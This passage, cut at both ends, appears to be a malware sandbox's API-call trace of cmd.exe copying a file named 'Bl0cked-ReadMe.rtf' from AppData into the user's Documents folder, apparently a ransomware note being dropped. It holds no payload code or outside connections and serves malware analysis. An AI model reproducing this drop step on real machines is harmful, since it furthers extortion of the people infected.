= "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11192 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 11193 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 11194 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11195 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 11196 start_va = 0x480000 end_va = 0x580fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 11197 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 11198 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 150 os_tid = 0x8b8 [0129.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf864 | out: lpSystemTimeAsFileTime=0x2cf864*(dwLowDateTime=0x871063e0, dwHighDateTime=0x1d440a9)) [0129.408] GetCurrentProcessId () returned 0x938 [0129.408] GetCurrentThreadId () returned 0x8b8 [0129.408] GetTickCount () returned 0x29665 [0129.408] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf85c | out: lpPerformanceCount=0x2cf85c*=18619682569) returned 1 [0129.408] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.408] __set_app_type (_Type=0x1) [0129.408] __p__fmode () returned 0x76b331f4 [0129.408] __p__commode () returned 0x76b331fc [0129.408] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.408] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.409] GetCurrentThreadId () returned 0x8b8 [0129.409] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b8) returned 0x38 [0129.409] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.409] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.409] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.409] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.409] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x2cf7f4 | out: phkResult=0x2cf7f4*=0x0) returned 0x2 [0129.409] VirtualQuery (in: lpAddress=0x2cf82b, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0129.409] GetConsoleOutputCP () returned 0x1b5 [0129.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.410] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.410] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0129.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.410] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.411] GetEnvironmentStringsW () returned 0x390168* [0129.411] FreeEnvironmentStringsW (penv=0x390168) returned 1 [0129.411] GetEnvironmentStringsW () returned 0x390168* [0129.411] FreeEnvironmentStringsW (penv=0x390168) returned 1 [0129.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce764 | out: phkResult=0x2ce764*=0x40) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x90, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x0, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegCloseKey (hKey=0x40) returned 0x0 [0129.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce764 | out: phkResult=0x2ce764*=0x40) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x0, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, 
lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegCloseKey (hKey=0x40) returned 0x0 [0129.412] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886364 [0129.412] srand (_Seed=0x5b886364) [0129.412] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0129.412] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0129.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.413] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.413] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.413] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.413] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.413] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.413] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.413] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.413] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.413] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.413] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.413] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.413] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.413] GetEnvironmentStringsW () returned 0x3922b8* [0129.413] FreeEnvironmentStringsW (penv=0x3922b8) returned 1 [0129.413] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.414] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.414] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.414] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.414] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.414] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.414] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf530 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.414] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf530, lpFilePart=0x2cf52c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf52c*="Desktop") returned 0x18 [0129.414] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) 
returned 0x38fff8 [0129.414] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) returned 0x38fff8 [0129.414] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) returned 0x38fff8 [0129.415] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.415] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.415] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.415] GetEnvironmentStringsW () returned 0x392ad8* [0129.415] FreeEnvironmentStringsW (penv=0x392ad8) returned 1 [0129.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.415] GetConsoleOutputCP () returned 0x1b5 [0129.415] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.415] GetUserDefaultLCID () returned 0x409 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf670, cchData=128 | out: lpLCData="0") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf670, cchData=128 | out: lpLCData="0") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf670, cchData=128 | out: lpLCData="1") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.416] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.416] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.417] GetConsoleTitleW (in: lpConsoleTitle=0x3808d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.418] _wcsicmp (_String1="type", _String2=")") returned 75 [0129.418] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0129.418] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0129.418] _wcsicmp (_String1="IF", _String2="type") returned -11 [0129.418] _wcsicmp (_String1="IF/?", 
_String2="type") returned -11 [0129.418] _wcsicmp (_String1="REM", _String2="type") returned -2 [0129.418] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] GetFileType (hFile=0x7) returned 0x2 [0129.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf568 | out: lpMode=0x2cf568) returned 1 [0129.422] _dup (_FileHandle=1) returned 3 [0129.422] _close (_FileHandle=1) returned 0 [0129.422] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0129.422] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf538, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0129.424] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0129.424] GetConsoleTitleW (in: lpConsoleTitle=0x2cf368, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.424] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0129.424] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0129.424] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0129.424] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0129.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.425] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ceecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceecc) returned 0x380e50 [0129.426] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0129.426] 
_wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0129.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0129.426] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cddd8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0129.426] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] GetFileType (hFile=0x54) returned 0x1 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cde30 | out: lpFileSizeHigh=0x2cde30*=0x0) returned 0x1632 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] GetFileType (hFile=0x4c) returned 0x1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] GetFileType (hFile=0x4c) returned 0x1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] GetFileType (hFile=0x4c) 
returned 0x1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.554] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.554] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, 
